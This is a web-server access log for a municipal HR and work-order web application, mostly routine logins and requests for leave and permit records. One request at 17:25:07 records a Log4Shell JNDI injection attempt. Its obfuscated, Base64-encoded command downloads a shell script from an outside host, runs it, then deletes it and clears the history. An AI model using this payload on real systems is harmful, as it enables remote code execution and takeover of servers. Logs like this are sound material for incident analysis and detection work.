190.171.144.234 - - [02/May/2022:17:19:01 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c714f55d43bce754e9ec9c0175517455ae6ccd35786b6308e5a256e891593c3f3795d6f25cfab57e2cc4e886dbf45ab032d8f4cb33f9a8c3d39c4d0f69c69333b9bddb682257de6965303e6a718fc028f0b7071da954d9408dc2805e09f9c541a2,gx-no-cache=1651521962954 HTTP/1.1" 200 110
190.171.144.234 - - [02/May/2022:17:19:01 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651521963000 HTTP/1.1" 200 97
190.171.144.234 - - [02/May/2022:17:19:11 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c71704e8bc145899186861f7c7c557ef81147fd869568ca811404c8f6479fa5c49466c5863d972003bbde4564337550a2ebb48f84492f502acad5fcc957f8ce8ddfea767697d137f7f2b5c5cbaa70117549db8a6ce7e2328f5b082f05be7db3398,gx-no-cache=1651521972764 HTTP/1.1" 200 29
190.171.144.234 - - [02/May/2022:17:19:12 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c73158d11f21397e42e91d4a9f7eb23550,gx-no-cache=1651521973905 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:19:12 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651521973931 HTTP/1.1" 200 30
192.168.10.11 - - [02/May/2022:17:19:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.144.234 - - [02/May/2022:17:20:09 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c7c8d033734da911ba971cd626e4afb4f32f69a5a4061e02b4a7b39ec516c556780e588dc2543e7a26068d5bf1fb4303b3,gx-no-cache=1651522031532 HTTP/1.1" 200 30
190.171.141.82 - - [02/May/2022:17:20:19 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10421
192.168.10.11 - - [02/May/2022:17:20:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.141.82 - - [02/May/2022:17:20:21 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10420
190.171.144.234 - - [02/May/2022:17:20:25 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c7e93766bb519fa7aee2343a4ec581ade1ba4524793d1db9969a8128fcbe9563c28892f2049c9430a44ad9ed0b63b00b9ac3ae31ae4ba22ac0d4be48aba8c962bcc92af342c84c5c210c35f17d79930a9ab4ae53e4353beb268c80901884b3b9ef376ebe731974b4d59365c9d1dd69faf6716abfb32b37b3866d3ecff34a864ace57f868ac515848da615b3244dcc0ef0f3abd3447d18bb72127f048ae4432f6a8a2eca4384aa8f8b903d89b0f2f976aa1bf6e5cee57e6a75271b17b3d7d6e4bce50bd46a37454a23692e59e6bf19bd91c838161535babe010112e430a78d199ea80fbd7e52c8e132bde4111b04ee1e8af10011788c18ec12d9f1d06d81e31782b20f445bc912e2cbc52dfcc70800ce29f4b04ce2a535bf433fb9103a8857d50c3d5fe08477ceadfd80c280414f1b6d1cd9e1e0901bcbd1bd10248872d6540c849efe04af18341e479227ac8a98a6657065d0d5112491b3f9cef74451ca6cdaae57f3de2eaebb82afc355abfc92f11efc3d7ef91c54731b54456c533d7ac64d05e,gx-no-cache=1651522047054 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:20:25 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522047088 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:20:25 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522047128 HTTP/1.1" 200 1454
190.171.144.234 - - [02/May/2022:17:20:25 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522047171 HTTP/1.1" 200 38
190.171.144.234 - - [02/May/2022:17:20:25 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c714f55d43bce754e9ec9c0175517455ae6ccd35786b6308e5a256e891593c3f3795d6f25cfab57e2cc4e886dbf45ab032d8f4cb33f9a8c3d39c4d0f69c69333b9bddb682257de6965303e6a718fc028f0b7071da954d9408dc2805e09f9c541a2,gx-no-cache=1651522047200 HTTP/1.1" 200 110
190.171.144.234 - - [02/May/2022:17:20:25 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522047231 HTTP/1.1" 200 96
190.171.144.234 - - [02/May/2022:17:20:25 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.143.106 - - [02/May/2022:17:20:58 -0300] "GET /cormun/servlet/prfichaempleado?,MD,,gxPopupLevel%3D0%3B HTTP/1.1" 200 9269
192.168.10.11 - - [02/May/2022:17:21:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.143.106 - - [02/May/2022:17:22:11 -0300] "POST /cormun/servlet/prfichaempleado?138232651895d4b165ce708694454ba7,,MD,,gxPopupLevel%3D0%3B,gx-no-cache=1651522154797 HTTP/1.1" 200 3410
190.171.143.106 - - [02/May/2022:17:22:17 -0300] "GET /cormun/servlet/licenciaspermisos?bb3b9d10ed0819a81bd7066c740915b251ed165382989057a89a7b0707af6baee350bef6d2f64b4abfb2bdf0b293e58ea0aaa3c0a07b5875644bff35aac57b74,gx-no-cache=1651522161525 HTTP/1.1" 200 84
190.171.143.106 - - [02/May/2022:17:22:17 -0300] "POST /cormun/servlet/licenciaspermisos?138232651895d4b165ce708694454ba7,INS,0,,,,gx-no-cache=1651522161561 HTTP/1.1" 200 4831
192.168.10.11 - - [02/May/2022:17:22:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.143.82 - - [02/May/2022:17:23:12 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
190.171.143.82 - - [02/May/2022:17:23:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
190.171.143.82 - - [02/May/2022:17:23:16 -0300] "POST /cormun/servlet/hlogin?3048204cd29854a035de0ce9ee0f6633,gx-no-cache=1651522217655 HTTP/1.1" 200 90
190.171.143.82 - - [02/May/2022:17:23:16 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.143.82 - - [02/May/2022:17:23:17 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4353
190.171.143.82 - - [02/May/2022:17:23:18 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4350
192.168.10.11 - - [02/May/2022:17:23:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.143.82 - - [02/May/2022:17:23:22 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13408
190.171.143.106 - - [02/May/2022:17:23:22 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.143.82 - - [02/May/2022:17:23:23 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13401
190.171.143.82 - - [02/May/2022:17:23:30 -0300] "POST /cormun/servlet/trlicencias?3048204cd29854a035de0ce9ee0f6633,,gx-no-cache=1651522230899 HTTP/1.1" 200 11126
190.171.143.82 - - [02/May/2022:17:23:39 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7494
190.171.143.82 - - [02/May/2022:17:23:41 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7513
190.171.143.82 - - [02/May/2022:17:23:45 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13404
190.171.143.82 - - [02/May/2022:17:23:46 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13409
190.95.67.97 - - [02/May/2022:17:23:52 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2022,18592,,1, HTTP/1.1" 200 5999
190.95.67.97 - - [02/May/2022:17:23:52 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.95.67.97 - - [02/May/2022:17:23:52 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2022,18592,,1, HTTP/1.1" 200 5993
190.171.143.82 - - [02/May/2022:17:23:53 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7494
190.95.67.97 - - [02/May/2022:17:23:53 -0300] "GET /cormun/servlet/solicitudotadjuntos?84649734c21562ebcadbf2278992689c3f6f27477c564349854ccdfff9b5de8804ee7a2178f8ea66d31965a43c1e21eb,gx-no-cache=1651522253714 HTTP/1.1" 200 30
190.95.67.97 - - [02/May/2022:17:23:53 -0300] "POST /cormun/servlet/solicitudotadjuntos?b5d2ce9a5b43debaa04fb112fe7fc610,INS,2022,18592,,1,,gx-no-cache=1651522253751 HTTP/1.1" 200 3881
190.171.143.82 - - [02/May/2022:17:23:54 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7513
190.95.67.97 - - [02/May/2022:17:23:55 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1651522255365 HTTP/1.1" 200 26
190.95.67.97 - - [02/May/2022:17:24:05 -0300] "GET /cormun/servlet/solicitudotadjuntos?84649734c21562ebcadbf2278992689cc55bc450284a5b169f0ea83873124bc3,gx-no-cache=1651522265856 HTTP/1.1" 200 30
190.95.67.97 - - [02/May/2022:17:24:05 -0300] "GET /cormun/servlet/solicitudotadjuntos?84649734c21562ebcadbf2278992689cc55bc450284a5b169f0ea83873124bc3,gx-no-cache=1651522265883 HTTP/1.1" 200 30
190.95.67.97 - - [02/May/2022:17:24:05 -0300] "POST /cormun/servlet/solicitudotadjuntos?b5d2ce9a5b43debaa04fb112fe7fc610,INS,2022,18592,,1, HTTP/1.1" 200 116
190.95.67.97 - - [02/May/2022:17:24:05 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1027
190.95.67.97 - - [02/May/2022:17:24:06 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2022,18592, HTTP/1.1" 200 10008
190.95.67.97 - - [02/May/2022:17:24:06 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2022,18592, HTTP/1.1" 200 10003
190.95.67.97 - - [02/May/2022:17:24:13 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 8562
190.95.67.97 - - [02/May/2022:17:24:13 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 8555
190.171.143.82 - - [02/May/2022:17:24:15 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13384
190.171.143.82 - - [02/May/2022:17:24:17 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13379
192.168.10.11 - - [02/May/2022:17:24:21 -0300] "GET / HTTP/1.1" 200 11217
190.95.67.97 - - [02/May/2022:17:24:28 -0300] "POST /cormun/servlet/trsolicitudot?b5d2ce9a5b43debaa04fb112fe7fc610,,gx-no-cache=1651522288889 HTTP/1.1" 200 4590
190.95.67.97 - - [02/May/2022:17:24:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.95.67.97 - - [02/May/2022:17:24:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.95.67.97 - - [02/May/2022:17:24:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.95.67.97 - - [02/May/2022:17:24:28 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.95.67.97 - - [02/May/2022:17:24:28 -0300] "POST /cormun/servlet/trsolicitudot?b5d2ce9a5b43debaa04fb112fe7fc610,,gx-no-cache=1651522289072 HTTP/1.1" 200 4349
190.171.143.82 - - [02/May/2022:17:24:29 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.143.82 - - [02/May/2022:17:24:34 -0300] "POST /cormun/servlet/trlicencias?3048204cd29854a035de0ce9ee0f6633,,gx-no-cache=1651522294885 HTTP/1.1" 200 13535
190.171.143.82 - - [02/May/2022:17:24:44 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220323000000, HTTP/1.1" 200 7483
190.171.143.82 - - [02/May/2022:17:24:45 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220323000000, HTTP/1.1" 200 7503
190.171.143.82 - - [02/May/2022:17:24:53 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15572
190.171.143.82 - - [02/May/2022:17:24:55 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15603
190.171.144.234 - - [02/May/2022:17:25:04 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3968
190.171.143.82 - - [02/May/2022:17:25:04 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220318000000, HTTP/1.1" 200 7483
190.171.144.234 - - [02/May/2022:17:25:05 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3976
190.171.143.82 - - [02/May/2022:17:25:05 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220318000000, HTTP/1.1" 200 7502
35.227.106.105 - - [02/May/2022:17:25:07 -0300] "GET /?id=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//45.61.188.160:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguOTEuMTQ2OjE5ODAvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xMzUuMTQ4LjkxLjE0NjoxOTgwL2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%7D%27) HTTP/1.1" 200 11217
190.171.143.106 - - [02/May/2022:17:25:07 -0300] "GET /cormun/servlet/licenciaspermisos?bb3b9d10ed0819a81bd7066c740915b2240e10c27818c96ee51540bf3871905b614e7e8cfca91e3f9ee40c3668fb3201748828953c80b5f592b046b8fd32e06537c99870e7ee3efb236ec0ba8ed592fd5a7ed2cb0aa7d708e90cbb9503e9ff3e54873eb1c7c903fb210bb582057f1efc92024ef6b5aa465746d6c82ee69b72b7231ab91fb918720b7d7d89b0135b7373a39ca0f79b0e0d1cff2bcf2e45d995003dae8bff177dcf00dae3f5addb106041255fd3754ec380e2cae355ab0e7344768e43f66ab6e8c801032fedd39142de0ed60e20a3da1eee9aa312decb774577ff,gx-no-cache=1651522331588 HTTP/1.1" 200 30
190.171.143.106 - - [02/May/2022:17:25:07 -0300] "POST /cormun/servlet/licenciaspermisos?138232651895d4b165ce708694454ba7,INS,0,,,,gx-no-cache=1651522331623 HTTP/1.1" 200 4921
190.171.143.82 - - [02/May/2022:17:25:12 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15566
190.171.143.82 - - [02/May/2022:17:25:14 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15572
190.171.143.106 - - [02/May/2022:17:25:17 -0300] "GET /cormun/servlet/licenciaspermisos?bb3b9d10ed0819a81bd7066c740915b251ed165382989057a89a7b0707af6baee676b937fd99cc894672403acef926a549721f24e11919560e75e0b5bb90f142ff5e4c8fb7d8c25af834a6ac409af7d6563cb9b9f767ce03d02212ea0323acc9798b9e80c53cbb009554b3b38cdabfeb59ed5e0e1e5e2bb93e88f8a5f86259453c1241bffae65facd4c1727842138c1b7008f5aa3205f2c84403fd1b62f268e7,gx-no-cache=1651522340776 HTTP/1.1" 200 114
190.171.143.106 - - [02/May/2022:17:25:17 -0300] "POST /cormun/servlet/licenciaspermisos?138232651895d4b165ce708694454ba7,INS,0,,,,gx-no-cache=1651522340852 HTTP/1.1" 200 4921
190.171.143.106 - - [02/May/2022:17:25:18 -0300] "GET /cormun/servlet/licenciaspermisos?bb3b9d10ed0819a81bd7066c740915b2240e10c27818c96ee51540bf3871905b2f9a4bdc52b9e0a20a58853aaacf496c748828953c80b5f592b046b8fd32e06537c99870e7ee3efb236ec0ba8ed592fd5a7ed2cb0aa7d708e90cbb9503e9ff3e54873eb1c7c903fb210bb582057f1efc92024ef6b5aa465746d6c82ee69b72b7231ab91fb918720b7d7d89b0135b7373a39ca0f79b0e0d1cff2bcf2e45d995003dae8bff177dcf00dae3f5addb106041255fd3754ec380e2cae355ab0e7344768e43f66ab6e8c801032fedd39142de0ed60e20a3da1eee9aa312decb774577ff,gx-no-cache=1651522342468 HTTP/1.1" 200 30
190.171.143.106 - - [02/May/2022:17:25:18 -0300] "POST /cormun/servlet/licenciaspermisos?138232651895d4b165ce708694454ba7,INS,0,,,,gx-no-cache=1651522342527 HTTP/1.1" 200 4918
190.171.143.106 - - [02/May/2022:17:25:20 -0300] "GET /cormun/servlet/prfichaempleado?,MD,,gxPopupLevel%3D0%3B HTTP/1.1" 200 9269
192.168.10.11 - - [02/May/2022:17:25:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.143.82 - - [02/May/2022:17:25:29 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1725
190.171.143.106 - - [02/May/2022:17:25:32 -0300] "POST /cormun/servlet/prfichaempleado?138232651895d4b165ce708694454ba7,,MD,,gxPopupLevel%3D0%3B,gx-no-cache=1651522355702 HTTP/1.1" 200 3400
190.171.143.82 - - [02/May/2022:17:25:32 -0300] "POST /cormun/servlet/hlogin?3048204cd29854a035de0ce9ee0f6633,gx-no-cache=1651522353488 HTTP/1.1" 200 90
190.171.143.82 - - [02/May/2022:17:25:32 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 956
190.171.143.82 - - [02/May/2022:17:25:33 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 15609
190.171.143.106 - - [02/May/2022:17:25:33 -0300] "GET /cormun/servlet/licenciaspermisos?bb3b9d10ed0819a81bd7066c740915b251ed165382989057a89a7b0707af6baee676b937fd99cc894672403acef926a549721f24e11919560e75e0b5bb90f142ff5e4c8fb7d8c25af834a6ac409af7d6563cb9b9f767ce03d02212ea0323acc9798b9e80c53cbb009554b3b38cdabfeb59ed5e0e1e5e2bb93e88f8a5f86259453c1241bffae65facd4c1727842138c1b7008f5aa3205f2c84403fd1b62f268e7,gx-no-cache=1651522357246 HTTP/1.1" 200 114
190.171.143.106 - - [02/May/2022:17:25:33 -0300] "POST /cormun/servlet/licenciaspermisos?138232651895d4b165ce708694454ba7,INS,0,,,,gx-no-cache=1651522357301 HTTP/1.1" 200 4918
190.171.143.106 - - [02/May/2022:17:25:35 -0300] "GET /cormun/servlet/licenciaspermisos?bb3b9d10ed0819a81bd7066c740915b2008e93f8278272923eb4cc4df524a79b932502b4a78101555bdf9c6cd9333cbbf8b0c4ba95cfcf15b56678c175cec730ef05537fa2a7d7d95aed4dc6ccf5e28d0d9bf38415a6565d35c195d0ac1bc437456144dca36d1df73815b972bda578eb528cb0f563b70db7a02ab4703a09dbd3a9e26a41869ea12544c28e90834c5fb689709ee697705e9bc13424d95150b2a80177e7d1da59936dc7576d6c572730fe429a9a03967ae0744d7ff0aa0939369b3b0653251acefcca81f1dcf1d902542a8c034dfc7013c849b652b55e640f42c3a22f60726d6a92eced6ddd2d3c9f4df2,gx-no-cache=1651522359139 HTTP/1.1" 200 58
190.171.143.82 - - [02/May/2022:17:25:35 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 15606
190.171.143.106 - - [02/May/2022:17:25:35 -0300] "POST /cormun/servlet/licenciaspermisos?138232651895d4b165ce708694454ba7,INS,0,,,,gx-no-cache=1651522359168 HTTP/1.1" 200 93
190.171.143.106 - - [02/May/2022:17:25:35 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1005
190.171.143.106 - - [02/May/2022:17:25:36 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 9365
190.171.143.106 - - [02/May/2022:17:25:36 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 9360
190.171.143.82 - - [02/May/2022:17:25:41 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12924
190.171.143.82 - - [02/May/2022:17:25:42 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12924
190.171.143.82 - - [02/May/2022:17:25:50 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15607
190.171.143.82 - - [02/May/2022:17:25:51 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15569
190.171.143.82 - - [02/May/2022:17:25:54 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.143.82 - - [02/May/2022:17:25:58 -0300] "POST /cormun/servlet/trlicencias?3048204cd29854a035de0ce9ee0f6633,,gx-no-cache=1651522379571 HTTP/1.1" 200 13755
190.171.143.82 - - [02/May/2022:17:26:06 -0300] "POST /cormun/servlet/trlicencias?3048204cd29854a035de0ce9ee0f6633,,gx-no-cache=1651522387327 HTTP/1.1" 200 6246
190.171.143.106 - - [02/May/2022:17:26:15 -0300] "GET /cormun/servlet/alicenciaprn?8224154,L,20220502000000,PU HTTP/1.1" 200 1609
192.168.10.11 - - [02/May/2022:17:26:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.144.234 - - [02/May/2022:17:26:42 -0300] "GET /cormun/servlet/prbanco?,MD,,gxPopupLevel%3D0%3B HTTP/1.1" 200 6544
190.171.143.82 - - [02/May/2022:17:26:56 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7494
190.171.144.234 - - [02/May/2022:17:26:57 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c76cee496fd3733460efe3a4671b97de35,gx-no-cache=1651522439503 HTTP/1.1" 200 53
190.171.143.82 - - [02/May/2022:17:26:58 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7513
190.171.143.82 - - [02/May/2022:17:27:14 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 8953
190.171.143.82 - - [02/May/2022:17:27:16 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 8952
192.168.10.11 - - [02/May/2022:17:27:21 -0300] "GET / HTTP/1.1" 200 11217
190.171.143.82 - - [02/May/2022:17:27:21 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7494
190.171.143.82 - - [02/May/2022:17:27:22 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,13720292,L,20220413000000, HTTP/1.1" 200 7513
190.171.143.82 - - [02/May/2022:17:27:28 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 8953
190.171.143.82 - - [02/May/2022:17:27:29 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 8952
190.171.143.82 - - [02/May/2022:17:27:33 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12924
190.171.143.82 - - [02/May/2022:17:27:34 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12924
190.171.153.26 - - [02/May/2022:17:27:38 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 6325
190.171.144.234 - - [02/May/2022:17:27:45 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c7e93766bb519fa7aee2343a4ec581ade1ba4524793d1db9969a8128fcbe9563c28892f2049c9430a44ad9ed0b63b00b9ac3ae31ae4ba22ac0d4be48aba8c962bcc92af342c84c5c210c35f17d79930a9ab4ae53e4353beb268c80901884b3b9ef376ebe731974b4d59365c9d1dd69faf6716abfb32b37b3866d3ecff34a864ace57f868ac515848da615b3244dcc0ef0f3abd3447d18bb72127f048ae4432f6a8a2eca4384aa8f8b903d89b0f2f976aa1bf6e5cee57e6a75271b17b3d7d6e4bce50bd46a37454a23692e59e6bf19bd91c838161535babe010112e430a78d199ea80fbd7e52c8e132bde4111b04ee1e8af10011788c18ec12d9f1d06d81e31782b20f445bc912e2cbc52dfcc70800ce29f4b04ce2a535bf433fb9103a8857d50c3d5fe08477ceadfd80c280414f1b6d1cd9e1e0901bcbd1bd10248872d6540c849efe04af18341e479227ac8a98a6657065d0d5112491b3f9cef74451ca6cdaae57f3de2eaebb82afc355abfc92f11efc3d7ef91c54731b54456c533d7ac64d05e,gx-no-cache=1651522486910 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:27:45 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522486945 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:27:45 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522486982 HTTP/1.1" 200 1454
190.171.144.234 - - [02/May/2022:17:27:45 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522487022 HTTP/1.1" 200 38
190.171.144.234 - - [02/May/2022:17:27:45 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c714f55d43bce754e9ec9c0175517455ae6ccd35786b6308e5a256e891593c3f3795d6f25cfab57e2cc4e886dbf45ab032d8f4cb33f9a8c3d39c4d0f69c69333b9bddb682257de6965303e6a718fc028f0b7071da954d9408dc2805e09f9c541a2,gx-no-cache=1651522487047 HTTP/1.1" 200 110
190.171.144.234 - - [02/May/2022:17:27:45 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522487069 HTTP/1.1" 200 96
190.171.153.26 - - [02/May/2022:17:27:46 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1743
190.171.144.234 - - [02/May/2022:17:27:46 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c7e93766bb519fa7aee2343a4ec581ade1ba4524793d1db9969a8128fcbe9563c28892f2049c9430a44ad9ed0b63b00b9ac3ae31ae4ba22ac0d4be48aba8c962bcc92af342c84c5c210c35f17d79930a9ab4ae53e4353beb268c80901884b3b9ef376ebe731974b4d59365c9d1dd69faf6716abfb32b37b3866d3ecff34a864ace57f868ac515848da615b3244dcc0ef0f3abd3447d18bb72127f048ae4432f6a8a2eca4384aa8f8b903d89b0f2f976aa1bf6e5cee57e6a75271b17b3d7d6e4bce50bd46a37454a23692e59e6bf19bd91c838161535babe010112e430a78d199ea80fbd7e52c8e132bde4111b04ee1e8af10011788c18ec12d9f1d06d81e31782b20f445bc912e2cbc52dfcc70800ce29f4b04ce2a535bf433fb9103a8857d50c3d5fe08477ceadfd80c280414f1b6d1cd9e1e0901bcbd1bd10248872d6540c849efe04af18341e479227ac8a98a6657065d0d5112491b3f9cef74451ca6cdaae57f3de2eaebb82afc355abfc92f11efc3d7ef91c54731b54456c533d7ac64d05e,gx-no-cache=1651522488594 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:27:47 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522488615 HTTP/1.1" 200 30
190.171.144.234 - - [02/May/2022:17:27:47 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522488654 HTTP/1.1" 200 1454
190.171.144.234 - - [02/May/2022:17:27:47 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522489054 HTTP/1.1" 200 38
190.171.144.234 - - [02/May/2022:17:27:47 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c714f55d43bce754e9ec9c0175517455ae6ccd35786b6308e5a256e891593c3f3795d6f25cfab57e2cc4e886dbf45ab032d8f4cb33f9a8c3d39c4d0f69c69333b9bddb682257de6965303e6a718fc028f0b7071da954d9408dc2805e09f9c541a2,gx-no-cache=1651522489078 HTTP/1.1" 200 110
190.171.144.234 - - [02/May/2022:17:27:47 -0300] "POST /cormun/servlet/solicitudot?gx-no-cache=1651522489105 HTTP/1.1" 200 96
190.171.144.234 - - [02/May/2022:17:27:53 -0300] "GET /cormun/servlet/solicitudot?2d7d40cfea87f13ea75191f9807dd9c7984b0c7400ac2f6a703624cceb05359721adf40d1e1d589754d81355fa5b423f,gx-no-cache=1651522494679 HTTP/1.1" 200 134
190.171.153.26 - - [02/May/2022:17:27:58 -0300] "POST /cormun/servlet/hlogin?3c406d23599cfcf0b06ab28337acd830,gx-no-cache=1651522498522 HTTP/1.1" 200 90
190.171.153.26 - - [02/May/2022:17:27:58 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
190.171.153.26 - - [02/May/2022:17:27:58 -0300] "GET /cormun/static/gxcfg.js?201991422392958 HTTP/1.1" 200 953
190.171.153.26 - - [02/May/2022:17:27:58 -0300] "GET /cormun/static/hpexe_link.js?201991422392963 HTTP/1.1" 200 625
190.171.153.26 - - [02/May/2022:17:27:59 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.153.26 - - [02/May/2022:17:27:59 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 8478
190.171.153.26 - - [02/May/2022:17:28:04 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 8477
190.171.143.82 - - [02/May/2022:17:28:07 -0300] "GET /cormun/Manuales/ManualContratos.pdf HTTP/1.1" 200 629147
190.171.153.26 - - [02/May/2022:17:28:07 -0300] "POST /cormun/servlet/trsolicitudot?3c406d23599cfcf0b06ab28337acd830,,gx-no-cache=1651522508120 HTTP/1.1" 200 5569
